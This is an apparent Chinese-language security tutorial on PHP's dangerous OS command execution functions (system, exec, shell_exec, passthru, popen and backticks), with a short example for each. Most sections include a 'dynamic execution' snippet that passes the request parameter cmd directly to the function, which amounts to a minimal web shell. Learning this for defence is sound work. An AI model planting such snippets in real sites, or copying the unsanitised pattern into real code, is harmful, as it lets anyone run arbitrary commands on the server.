PHP 危险函数1-OS 命令执行函数

OS 命令执行函数

system 函数

• 特点：

  • 自带输出功能
  • 自动区分系统平台，只需得知目标系统在 system() 中输入对应系统的命令即可

• 使用

  
  	system("<系统命令>");  
  ?>
  1
  2
  3

  如

  <pre>
  <?php
  	system("ipconfig");  
  ?>
  1
  2
  3
  4

  

• 动态执行命令

  <pre>
  <?php
  	$cmd = $_REQUEST['cmd'];
  	system($cmd);  
  ?>
  1
  2
  3
  4
  5

  

exec 函数

• 特点：

  • 不自带输出，需要手动输出
  • 只能输出命令执行的最后一行，几乎没有回显

• 使用

  
  	exec("<系统命令>");  
  	// 输出需手动
  ?>
  1
  2
  3
  4

• 例

  
  	exec("ipconfig");  
  	// 输出需手动
  ?>
  1
  2
  3
  4

  不自动回显，但执行

  

• 回显（只有最后一行）

  
  	echo exec("ipconfig");  
  ?>
  1
  2
  3

  

• 动态执行命令

  
  	$cmd=$_REQUEST['cmd'];
  	echo exec($cmd);
      ?>
  1
  2
  3
  4

  

  

shell_exec 函数

• 需要手动输出命令执行结果。

• 使用

  
  	shell_exec("<命令>");
      ?>
  1
  2
  3

• 示例

  
  	$cmd=$_REQUEST['cmd'];
  	echo shell_exec($cmd);
      ?>
  1
  2
  3
  4

  

passthru 函数

• 自带输出功能。

  
      passthru("<命令>");
      ?>
  1
  2
  3

• 例

  
      passthru("net user");
      ?>
  1
  2
  3

  

• 动态执行

  
  	$cmd=$_REQUEST['cmd'];
  	echo passthru($cmd);
      ?>
  1
  2
  3
  4

  

popen 函数

• 在 PHP 中，popen() 函数用于打开一个管道，并返回一个指向该管道的文件指针。允许在 PHP 脚本中执行外部命令或程序，并与其进行交互。

• 注意，两个参数

  
  	popen(<命令>,"r");  // read，以读取的方式打开
  ?>
  1
  2
  3

• 示例

  
  	$cmd = $_REQUEST['cmd'];
  	$result = popen($cmd, 'r');
  	echo fread($result, 1024);
  	// fread() 函数从管道中读取最多 1024 字节的输出
      ?>
  1
  2
  3
  4
  5
  6

  

反引号

• 反引号``内的字符串，会被解析成OS 命令。

• 不自动输出

• 使用

  
      `<命令>`;
  ?>
  1
  2
  3

• 示例

  
      echo `whoami`;
  ?>
  1
  2
  3

  

• 动态执行

  <pre>
  <?php
  	$cmd=$_REQUEST['cmd'];
  	echo `$cmd`;
      ?>
  1
  2
  3
  4
  5